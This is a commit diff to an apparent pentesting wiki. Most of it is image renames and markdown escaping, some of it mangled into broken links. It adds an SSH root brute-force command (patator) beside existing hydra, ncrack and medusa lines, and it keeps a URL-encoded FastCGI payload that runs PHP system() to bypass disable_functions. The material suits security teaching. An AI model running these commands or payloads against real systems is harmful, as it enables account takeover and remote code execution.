GitBook: [master] 6 pages and 12 assets modified

2024-11-14 08:57:55 +00:00 · 2021-07-06 18:11:30 +00:00 · 2021-07-06 18:11:30 +00:00 · 51c9a9d7e3
commit 51c9a9d7e3
parent 47cae5fddd
12 changed files with 9 additions and 13 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/brute-force.md
+++ b/brute-force.md
@ -367,6 +367,7 @@ msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block account
 hydra -l root -P passwords.txt [-t 32] <IP> ssh
 ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
 medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
+patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
 ```

 ### Telnet
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi

 Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).

-![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)

 ### USB Detective

--- a/mobile-apps-pentesting/ios-pentesting/README.md
+++ b/mobile-apps-pentesting/ios-pentesting/README.md
@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
 5. Reproduce the problem.
 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.

-![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)

 You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

--- a/pentesting-web/saml-attacks/README.md
+++ b/pentesting-web/saml-attacks/README.md
@ -6,7 +6,7 @@

 ## Attacks Graphic

-![](../../.gitbook/assets/image%20%28554%29.png)
+![](../../.gitbook/assets/image%20%28535%29%20%281%29.png)

 ## Tool

--- a/pentesting/pentesting-ftp/README.md
+++ b/pentesting/pentesting-ftp/README.md
@ -15,6 +15,7 @@ PORT   STATE SERVICE
 ## Enumeration

 ### Nmap FTP scripts
+
 ```bash
 nmap --script ftp-* -p 21 <ip>
 ```
--- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@ -13,7 +13,7 @@ Normally web pages, files and all of the documents which are transferred from th

 If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.

-For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. \(explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)\)
+For example, when the CGI script [http://mysitename.com/\*\*cgi-bin/file.pl\*\*](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. \(explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)\)

 ### FastCGI

@ -21,10 +21,6 @@ For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is ac

 The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**

-## RCE \(7.\[123\].x\)
-
-This [**metasploit module**](https://www.rapid7.com/db/modules/exploit/multi/http/php_fpm_rce/) exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of **PHP-FPM on Nginx**.
-
 ## disable\_functions bypass

 It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
@ -32,14 +28,14 @@ It's possible to run PHP code abusing the FastCGI and avoiding the `disable_func
 ### Via Gopherus

 {% hint style="danger" %}
-I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via  ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or twitter [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or twitter \[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.\*\*
 {% endhint %}

 Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:

 ![](../../../../.gitbook/assets/image%20%28385%29.png)

-Then, you can grab the urlencoded payload and decode it and transform to base64, [**using this recipe of cyberchef for example**](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw). And then copy/pasting the abse64 in this php code:
+Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**\]\([http://icyberchef.com/\#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)\). And then copy/pasting the abse64 in this php code:

 ```php
 <?php
@ -51,7 +47,7 @@ Uploading and accessing this script the exploit is going to be sent to FastCGI \
 ### PHP exploit

 {% hint style="danger" %}
-I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP \(somehow\) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via  ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or twitter [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP \(somehow\) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or twitter \[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.\*\*
 {% endhint %}

 ```php
@ -435,5 +431,3 @@ You will find that the exploit is very similar to the previous code, but instead
 You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).  
 You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**

-
-